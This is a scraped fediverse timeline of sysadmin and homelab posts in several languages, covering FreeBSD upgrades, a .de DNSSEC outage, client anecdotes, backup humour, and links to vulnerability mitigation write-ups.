                                                                                                                                                                                                                                                                                                                                                                                                                        No port. No sudoers parser. No setuid helper. Just a kernel MAC policy, a sysctl rule, and an explicit “SSH is the gate” security model.

                                                                                                                                                                                                                                                                                                                                                                                                                        Wrote up the full walkthrough for FreeBSD 15, including rule syntax, examples, caveats, and my surrounding hardening sysctls:

                                                                                                                                                                                                                                                                                                                                                                                                                        blog.hofstede.it/mdo-on-freebs

                                                                                                                                                                                                                                                                                                                                                                                                                          [?]Gauff » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                          @gaufff@piaille.fr

                                                                                                                                                                                                                                                                                                                                                                                                                          to people:

                                                                                                                                                                                                                                                                                                                                                                                                                          Do you know where I can find online (in self-study mode) for people who might need to learn the fundamentals of IT , , , etc?

                                                                                                                                                                                                                                                                                                                                                                                                                          If it is available in an spirit (a bit like ), that would be fantastic.

                                                                                                                                                                                                                                                                                                                                                                                                                          I'd like to give some pointers to people who need basic initial guidance.

                                                                                                                                                                                                                                                                                                                                                                                                                          Thank you!!!

                                                                                                                                                                                                                                                                                                                                                                                                                            seb boosted

                                                                                                                                                                                                                                                                                                                                                                                                                            [?]anarcat » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                            @Anarcat@kolektiva.social

                                                                                                                                                                                                                                                                                                                                                                                                                            [?]Haack’s Networking » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                            @oemb1905@gnulinux.social

                                                                                                                                                                                                                                                                                                                                                                                                                            Webmin is hardened & clustered w/ three total nodes, ns1, ns2, and ns3 etc. I will eventually add clustered nodes on two other locations so records are still served when one cluster's host is down.

                                                                                                                                                                                                                                                                                                                                                                                                                            tech.haacksnetworking.org/2025 feedback welcome.

                                                                                                                                                                                                                                                                                                                                                                                                                            Added larger tmp directory & source-IPd vhost so webmin won't lock. Obv, make sure you use static, dedicated, & fully hardened external IPs for permitted list.

                                                                                                                                                                                                                                                                                                                                                                                                                            haack's networking business logo

                                                                                                                                                                                                                                                                                                                                                                                                                            Alt...haack's networking business logo

                                                                                                                                                                                                                                                                                                                                                                                                                              [?]Florian 'floe' Echtler » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                              @floe@hci.social

                                                                                                                                                                                                                                                                                                                                                                                                                              I had found a very thorough server checker (e.g. TLS, DKIM, certificates, PFS, DMARC, you name it) here on the fedi at some point and thought I'd bookmarked it, but just can't find it anymore. Any recommendations from the sysadmin crowd?

                                                                                                                                                                                                                                                                                                                                                                                                                                [?]viq [he/him] » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                @viq@social.hackerspace.pl

                                                                                                                                                                                                                                                                                                                                                                                                                                I describe myself as a fanboi. But existence of this file github.com/saltstack/salt/blob and especially the first point there, sounds like it's time to do that in past tense. Shame, it was an interesting project, with capabilities hardly anything else has.

                                                                                                                                                                                                                                                                                                                                                                                                                                  AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]⚓💾 Tueddelmors 💾⚓ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                  @reeeen@norden.social

                                                                                                                                                                                                                                                                                                                                                                                                                                  3 Uhr nachts, ich update mein Arch-System und denke: "Wird schon nichts kaputtgehen."

                                                                                                                                                                                                                                                                                                                                                                                                                                  Spoiler: Es ging was kaputt.

                                                                                                                                                                                                                                                                                                                                                                                                                                  Der Bootloader und ich haben jetzt eine gemeinsame Therapie gebucht. 🫠

                                                                                                                                                                                                                                                                                                                                                                                                                                  Aber hey – immerhin habe ich gelernt, dass `journalctl -xb` mein bester Freund ist. Und Snapper-Snapshots vorher? Hätte. Hätte. Fahrradkette.

                                                                                                                                                                                                                                                                                                                                                                                                                                  Macht Backups, Freunde. Nicht morgen. Jetzt.

                                                                                                                                                                                                                                                                                                                                                                                                                                    Fred de CLX boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                    [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                    @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                                                                                                    This morning, something happened that brought me immense pleasure. A long-standing client called and asked if they could "bother" me. I replied that they weren't bothering me at all, and that I was "testing some new things". They immediately said, "Oh, I'll call you another time then".
                                                                                                                                                                                                                                                                                                                                                                                                                                    Of course, they had my full and undivided attention from that moment on.

                                                                                                                                                                                                                                                                                                                                                                                                                                    One of the challenging aspects of my work method is making people (not necessarily clients, but generally) understand that experimentation is more important than deployment itself. When they see me set up a server in a very short time (and it will stay up for years), it's not (just) because I use effective tools, but also because it's backed by research, errors, and successes. In a word: experience.

                                                                                                                                                                                                                                                                                                                                                                                                                                    Sitting in front of my computer with two old APUs, therefore, isn't a pastime but one of the most critical parts of my testing. Dated and underperforming hardware necessitates optimization. When people grasp this, it's a true joy for me.

                                                                                                                                                                                                                                                                                                                                                                                                                                    Now, if you'll excuse me, I need to go check how a signal penetrates concrete walls with three different access points placed in the same spot...

                                                                                                                                                                                                                                                                                                                                                                                                                                    ...And the fact that I enjoy all of this immensely is just an added bonus! 😆

                                                                                                                                                                                                                                                                                                                                                                                                                                    Two rectangular APU devices stacked on a worn desk. The top device is black and features a small white label on its top surface, with cables connected to its rear. Underneath it, a reddish-pink device is visible. In the background, out of focus, parts of other electronic equipment and cables can be seen, including a 20 years old pair of AKG headphones.

                                                                                                                                                                                                                                                                                                                                                                                                                                    Alt...Two rectangular APU devices stacked on a worn desk. The top device is black and features a small white label on its top surface, with cables connected to its rear. Underneath it, a reddish-pink device is visible. In the background, out of focus, parts of other electronic equipment and cables can be seen, including a 20 years old pair of AKG headphones.

                                                                                                                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                      @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                                                                                                      "I need the full DevOps workflow to publish the site."

                                                                                                                                                                                                                                                                                                                                                                                                                                      "It's a static site. Here are the SFTP credentials to upload the files you have, which were generated by the client's SSG."

                                                                                                                                                                                                                                                                                                                                                                                                                                      "You don't understand. I need to upload the site; I need the DevOps procedure."

                                                                                                                                                                                                                                                                                                                                                                                                                                      "No, you don't understand. It's generated by BSSG; all you have to do is upload the output via SFTP into the FreeBSD jail and the deploy is automatic."

                                                                                                                                                                                                                                                                                                                                                                                                                                      Silence.

                                                                                                                                                                                                                                                                                                                                                                                                                                      "But how does the deploy bot handle it?"

                                                                                                                                                                                                                                                                                                                                                                                                                                      Silence.

                                                                                                                                                                                                                                                                                                                                                                                                                                      The person who hired him (as an intern) gets on the line:
                                                                                                                                                                                                                                                                                                                                                                                                                                      "Just humor him, the kid is sharp-he's really good with AI!"

                                                                                                                                                                                                                                                                                                                                                                                                                                      I tell him we're talking about two completely different things.

                                                                                                                                                                                                                                                                                                                                                                                                                                      He fires back: "If you can't keep up with him, I think you need to update your skills. That's what we're paying you for."

                                                                                                                                                                                                                                                                                                                                                                                                                                      And that was that. I've decided that for 80 Euros a year - while providing a dedicated FreeBSD jail, over 100GB of hosting, backups, monitoring, and custom BSSG tweaks - they can definitely find someone more "up to date" elsewhere.

                                                                                                                                                                                                                                                                                                                                                                                                                                        AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                        [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                        @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                                                                                                        "I need the full DevOps workflow to publish the site."

                                                                                                                                                                                                                                                                                                                                                                                                                                        "It's a static site. Here are the SFTP credentials to upload the files you have, which were generated by the client's SSG."

                                                                                                                                                                                                                                                                                                                                                                                                                                        "You don't understand. I need to upload the site; I need the DevOps procedure."

                                                                                                                                                                                                                                                                                                                                                                                                                                        "No, you don't understand. It's generated by BSSG; all you have to do is upload the output via SFTP into the FreeBSD jail and the deploy is automatic."

                                                                                                                                                                                                                                                                                                                                                                                                                                        Silence.

                                                                                                                                                                                                                                                                                                                                                                                                                                        "But how does the deploy bot handle it?"

                                                                                                                                                                                                                                                                                                                                                                                                                                        Silence.

                                                                                                                                                                                                                                                                                                                                                                                                                                        The person who hired him (as an intern) gets on the line:
                                                                                                                                                                                                                                                                                                                                                                                                                                        "Just humor him, the kid is sharp-he's really good with AI!"

                                                                                                                                                                                                                                                                                                                                                                                                                                        I tell him we're talking about two completely different things.

                                                                                                                                                                                                                                                                                                                                                                                                                                        He fires back: "If you can't keep up with him, I think you need to update your skills. That's what we're paying you for."

                                                                                                                                                                                                                                                                                                                                                                                                                                        And that was that. I've decided that for 80 Euros a year - while providing a dedicated FreeBSD jail, over 100GB of hosting, backups, monitoring, and custom BSSG tweaks - they can definitely find someone more "up to date" elsewhere.

                                                                                                                                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                          [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                          @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                          One of the few things that worries me any more is updating boot code after a zpool upgrade.

                                                                                                                                                                                                                                                                                                                                                                                                                                          I'm sure it'll be fine, but if I disappear forever you know what happened.

                                                                                                                                                                                                                                                                                                                                                                                                                                            Fred de CLX boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                            [?]Stefano Marinelli » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                            @stefano@mastodon.bsd.cafe

                                                                                                                                                                                                                                                                                                                                                                                                                                            A client asked for a server install for a specific CRM developed by one of Italy's biggest software houses. They’re dropping Windows Server 2022 support in a few months, even though the OS itself has a much longer lifecycle.

                                                                                                                                                                                                                                                                                                                                                                                                                                            We looked into Linux support: Rocky Linux 9 and Ubuntu 24.04 are "certified", but only until April 2027. Since we'd rather not reinstall everything in less than a year, we asked for a path that guarantees official support beyond 2027.

                                                                                                                                                                                                                                                                                                                                                                                                                                            The "support" team replied with a canned response, attaching a 2023 document where every single distribution is listed as EoL since 2025. 🤡

                                                                                                                                                                                                                                                                                                                                                                                                                                            And then people ask me why these "software giants" are the primary cause of my receding hairline...

                                                                                                                                                                                                                                                                                                                                                                                                                                              [?]Cryptolab.re » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                              @foudreclair@piaille.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                              Une faille vieille de 18 ans dans Nginx, un PoC public, beaucoup de bruit… mais qui est vraiment concerné ?

                                                                                                                                                                                                                                                                                                                                                                                                                                              cryptolab.re/posts/2026/nginx-

                                                                                                                                                                                                                                                                                                                                                                                                                                                AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                [?]⚓💾 Tueddelmors 💾⚓ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                @reeeen@norden.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                3 Uhr morgens, ich starre auf ein Bash-Script, das gestern noch funktioniert hat. Nichts wurde geändert. Niemand hat es angefasst. Es funktioniert einfach nicht mehr.

                                                                                                                                                                                                                                                                                                                                                                                                                                                Das ist der Moment, in dem man versteht, warum frühe Informatiker an Geister geglaubt haben. 👻

                                                                                                                                                                                                                                                                                                                                                                                                                                                `set -x` ist mein Beichtvater geworden.

                                                                                                                                                                                                                                                                                                                                                                                                                                                  AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Avis aux curieux du Labo !

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Le prochain numéro de la newsletter "Le Labo Wiki" est sur les rails. Au programme : un pack "Power User" complet avec de l'IPv6 aux petits oignons, du GeoIP, du S3 et bien d'autres astuces pour une infra au top.

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Surveillez votre boîte mail ce lundi 18 mai à 18h00 !

                                                                                                                                                                                                                                                                                                                                                                                                                                                  Pas encore abonné à cette liste ? C'est le moment de corriger ça pour ne rien rater des prochains dossiers techniques :
                                                                                                                                                                                                                                                                                                                                                                                                                                                  listmonk.blablalinux.be/subscr

                                                                                                                                                                                                                                                                                                                                                                                                                                                    Alexandre :freebsd: boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                    [?]Larvitz :fedora: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                    @Larvitz@burningboard.net

                                                                                                                                                                                                                                                                                                                                                                                                                                                    New post: FreeBSD resource monitoring and accounting.

                                                                                                                                                                                                                                                                                                                                                                                                                                                    A practical tour of the base-system toolkit for figuring out *what is actually using my server*: top, vmstat, systat, gstat, netstat/sockstat, procstat, pfctl, and per-jail attribution with kern.racct and rctl.

                                                                                                                                                                                                                                                                                                                                                                                                                                                    No ports, no agents. Just FreeBSD.

                                                                                                                                                                                                                                                                                                                                                                                                                                                    blog.hofstede.it/freebsd-resou

                                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]viq [he/him] » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                      @viq@social.hackerspace.pl

                                                                                                                                                                                                                                                                                                                                                                                                                                                      Out of the / solutions I can that I remembered about, apparently only has ability to create app passwords / bearer tokens that actually allow to access only a single application 🤔


                                                                                                                                                                                                                                                                                                                                                                                                                                                      @homelab

                                                                                                                                                                                                                                                                                                                                                                                                                                                        AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                        [?]⚓💾 Tueddelmors 💾⚓ » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                        @reeeen@norden.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                        Guten Morgen! ☕

                                                                                                                                                                                                                                                                                                                                                                                                                                                        Erinnerung an mich selbst: `rm -rf` ist kein Backup-Tool. Auch nicht um 7 Uhr. Auch nicht mit Kaffee.

                                                                                                                                                                                                                                                                                                                                                                                                                                                        Apropos: Wann habt ihr eigentlich das letzte Mal einen Restore getestet? Nicht das Backup – den Restore. Das ist nämlich der Teil, der zählt. Ein Backup, das man nie zurückspielt, ist nur ein teurer Datenfriedhof.

                                                                                                                                                                                                                                                                                                                                                                                                                                                          [?]Cryptolab.re » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                          @foudreclair@piaille.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                          Dirty Frag vient de sortir : une nouvelle faille Linux permettant une élévation locale de privilèges jusqu’à root via le page cache, xfrm/ESP et RxRPC.

                                                                                                                                                                                                                                                                                                                                                                                                                                                          J’ai écrit un article pour expliquer :
                                                                                                                                                                                                                                                                                                                                                                                                                                                          - ce que fait la faille
                                                                                                                                                                                                                                                                                                                                                                                                                                                          - pourquoi elle rappelle Dirty Pipe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          - quoi vérifier sur ses serveurs
                                                                                                                                                                                                                                                                                                                                                                                                                                                          - quelles mitigations appliquer

                                                                                                                                                                                                                                                                                                                                                                                                                                                          cryptolab.re/posts/2026/dirty-

                                                                                                                                                                                                                                                                                                                                                                                                                                                            [?]Cryptolab.re » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                            @foudreclair@piaille.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                            Ubuntu 26.04 LTS est sortie, mais côté serveur ce n’est pas une simple mise à jour “nouvelle LTS, nouveau noyau”.

                                                                                                                                                                                                                                                                                                                                                                                                                                                            J’ai écrit un article orienté admins/VPS/homelab : support, OpenSSH 10.2, Chrony, paquets serveur, sécurité, GPU/IA, cloud, Livepatch et stratégie de migration depuis 24.04 LTS.

                                                                                                                                                                                                                                                                                                                                                                                                                                                            À lire avant de lancer un `do-release-upgrade` un peu trop confiant :

                                                                                                                                                                                                                                                                                                                                                                                                                                                            cryptolab.re/posts/2026/ubuntu

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Marcos Dione boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                              [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                              @rysiek@mstdn.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                              If anyone knows of any decent write-up on securing ZooKeeper / ClickHouse Keeper, I am very interested.

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Documentation of both is really crap I find, and security seems to be a complete afterthought.

                                                                                                                                                                                                                                                                                                                                                                                                                                                              I would love to be proven wrong on that last bit.

                                                                                                                                                                                                                                                                                                                                                                                                                                                              :boost_ok:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                (Edit to add: I am an idiot, this host was never pkgbasified, but leaving for the edification of others)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                Weird thing.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                I updated my hosts from 14->15 with freebsd-update, then ran pkgbaseify and switched to pkgbase. No problem.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                My jails & bhyves update, no problem.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                # freebsd-version
                                                                                                                                                                                                                                                                                                                                                                                                                                                                15.0-RELEASE-p8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                The bare metal install?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                # freebsd-version
                                                                                                                                                                                                                                                                                                                                                                                                                                                                15.0-RELEASE-p4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                # pkg upgrade -r FreeBSD-base
                                                                                                                                                                                                                                                                                                                                                                                                                                                                Updating FreeBSD-base repository catalogue...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                FreeBSD-base repository is up to date.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                FreeBSD-base is up to date.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                Checking for upgrades (1 candidates): 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                Processing candidates (1 candidates): 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                Checking integrity... done (0 conflicting)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                Your packages are up to date.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                So it finds packages, but there's nothing to update?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  converted my hosts to pkgbase, including some tiny VMs with 20GB disks. Why is are these disks full?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Well, /var/db/freebsd-update was ~7GB.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  (Yes, most of my critical hosts are VMs on rented hardware, but these are offsite DNS and remote test nodes.)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Marcos Dione boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    [?]Paco Hope [He/Him] » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @paco@infosec.exchange

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @phocks Good luck!

                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Remember to practice the 3-2-1 backup strategy: 3 copies of your important data: 2 you can't decrypt, and 1 you cannot find.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      @rysiek@mstdn.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Here's a thought:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      The fact that people are experiencing issues with DE sites and asking if CloudFlare is down speaks volumes about the stability of DE ccTLD and the broader DNS compared to big cloud providers.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                      :blobcatcoffee:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @rysiek@mstdn.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        DENIC's status page:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        status.denic.de/

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Screenshot below in case you're not able to load it (as I said, stuff is going to be intermittently failing).

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        DNSSEC disruption affecting .de domainsPartial Service Disruption

Incident Status

Partial Service Disruption

Components

DNS

Services

DNS Nameservice

May 5, 2026 23:28 CEST
May 5, 2026 21:28 UTC
INVESTIGATING

Frankfurt am Main, 5 May 2026 – DENIC eG is currently experiencing a disruption in its DNS service for .de domains. As a result, all DNSSEC-signed .de domains are currently affected in their reachability.
The root cause of the disruption has not yet been fully identified. DENIC’s technical teams are working intensively on analysis and on restoring stable operations as quickly as possible.
Based on current information, users and operators of .de domains may experience impairments in domain resolution. Further updates will be provided as soon as reliable findings on the cause and recovery are available.
DENIC asks all affected parties for their understanding.
For further enquiries, DENIC can be contacted via the usual channels.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Alt...DNSSEC disruption affecting .de domainsPartial Service Disruption Incident Status Partial Service Disruption Components DNS Services DNS Nameservice May 5, 2026 23:28 CEST May 5, 2026 21:28 UTC INVESTIGATING Frankfurt am Main, 5 May 2026 – DENIC eG is currently experiencing a disruption in its DNS service for .de domains. As a result, all DNSSEC-signed .de domains are currently affected in their reachability. The root cause of the disruption has not yet been fully identified. DENIC’s technical teams are working intensively on analysis and on restoring stable operations as quickly as possible. Based on current information, users and operators of .de domains may experience impairments in domain resolution. Further updates will be provided as soon as reliable findings on the cause and recovery are available. DENIC asks all affected parties for their understanding. For further enquiries, DENIC can be contacted via the usual channels.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          [?]Hyde 📷 🖋 :debian: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          @hyde@lazybear.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          @tg I dont have that but have you checked this :

                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Find the better Hetzner server deals - github.com/clouedoc/hzfind

                                                                                                                                                                                                                                                                                                                                                                                                                                                                            [?]Hyde 📷 🖋 :debian: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            @hyde@lazybear.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3 ★ 0 ↺

                                                                                                                                                                                                                                                                                                                                                                                                                                                                            [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                                            hello,
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            aujourd'hui incident de prod... ca m'avait pas manqué.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            mais là c'est un incident de prod planifié,le client nous a prevenu en avance, on lui as dit que ca allait planté, on a fait ce qu'on a pu mais ca n'a pas suffit...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            maintenant faut faire le rapport...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            mais bon, le client est quand meme content ! (on a les meilleurs clients de France, voir du MONDE).

                                                                                                                                                                                                                                                                                                                                                                                                                                                                            bref prochain incident de prod prévu demain à 9:00 pour un autre client (ou pas, on verra bien).

                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10 ★ 3 ↺

                                                                                                                                                                                                                                                                                                                                                                                                                                                                              [?]oldsysops » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @oldsysops@social.dk-libre.fr

                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Hello,

                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • j'ai réussi à ne pas me mettre sur mon pc le 1er mai (j'ai craqué le 2 au soir...)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • le jardin avance bien,sauf mes plans de tomates qui ne prennent vraiment pas... il me reste des graines, je vais retenter.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              on a eu la première fraise du jardin, bien rouge et pleine de goût (mais pas trop sucré).
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • j'ai installé sur mon et j'en suis plutôt content, pas de fonctionnalité manquantes... reste que côté sécurité c'est peut etre pas top de laisser ca accessible directement sur internet ( ca sens le mot passe supplémentaire en .httpacces en dehors de la maison).
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              prochaine étape, roundcube (ou pas, nextcloud permet de lire les mails) ou ou une instance visio ou

                                                                                                                                                                                                                                                                                                                                                                                                                                                                              le champ des possibles est infini (ou presque)

                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Bon dimanche, prennez soin de vous et aujourd'hui surtout : faites vous plaisir !


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                [?]Jérémy Lecour » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @jlecour@mastodon.evolix.org

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Si vous êtes à Marseille ou proche le vendredi 5 juin, je vous invite à la soirée spéciale Proxmox de @plugfr : plugfr.org/reunions/5-juin-202

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  [?]Monospace Mentor » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  @monospace@floss.social

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  RE: floss.social/@mikebabcock/1162

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  find is the razor blade of shell tools. You'll make the finest, easiest cuts eventually. But the way to get there is a series of painful nicks.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    [?]Larvitz :fedora: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @Larvitz@burningboard.net

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Fresh gist: mitigating CVE-2026-31431 ("Copy Fail") on RHEL 8/9/10 with a tiny Ansible playbook.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    It blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    codeberg.org/Larvitz/gists/src

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      🚨 Alerte Sécurité Linux ! La faille "Copy Fail" (CVE-2026-31431) permet de devenir root sur presque toutes les distribs depuis 2017 😱

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C'est invisible et redoutable pour vos conteneurs ! Découvrez tout ce qu'il faut savoir et comment patcher ici : 👇

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      blablalinux.be/b/4S1?utm_sourc

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        [?]Larvitz :fedora: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        @Larvitz@burningboard.net

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Fresh gist: mitigating CVE-2026-31431 ("Copy Fail") on RHEL 8/9/10 with a tiny Ansible playbook.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        It blacklists algif_aead via a kernel boot arg (initcall_blacklist=algif_aead_init), reboots only when needed, and asserts the mitigation actually stuck after reboot. Idempotent & safe to re-run.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        codeberg.org/Larvitz/gists/src

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          AodeRelay boosted

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          [?]BlablaLinux » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          @blablalinux@mastodon.blablalinux.be

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          🐧 Base solide : Le système passe sur Debian 13.4 (Trixie) avec un Kernel Linux 7.0 et ZFS 2.4.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Une version qui mise sur la flexibilité et la performance pour nos infrastructures !

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          👉 Tous les détails ici : proxmox.com/en/about/company-d

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            what do you mean "404 file not found" it's right freaking there! :flan_headdesk:

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              [?]Michael W Lucas :flan_on_fire: » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              @mwl@io.mwl.io

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Me: I could just add more HTTP redirects to redirect the redirects to the redirected--

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Also me: You're an idiot. You know that, don't you? One redirect at most, you dumbass.

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                [?]Lanie » 🌐
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @RareBird15@allovertheplace.ca

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Let's talk CLI/TUI and Developer Workflows!

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                I’m looking to refresh my local toolkit and I’m curious: what are the absolute "must-have" CLI or TUI programs in your current rotation?

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Whether it's a specialized utility for a specific language, a terminal-based interface for a common service, or a workflow-changing alias, I want to hear about it. I’m especially interested in tools that prioritize keyboard-driven navigation and accessibility.

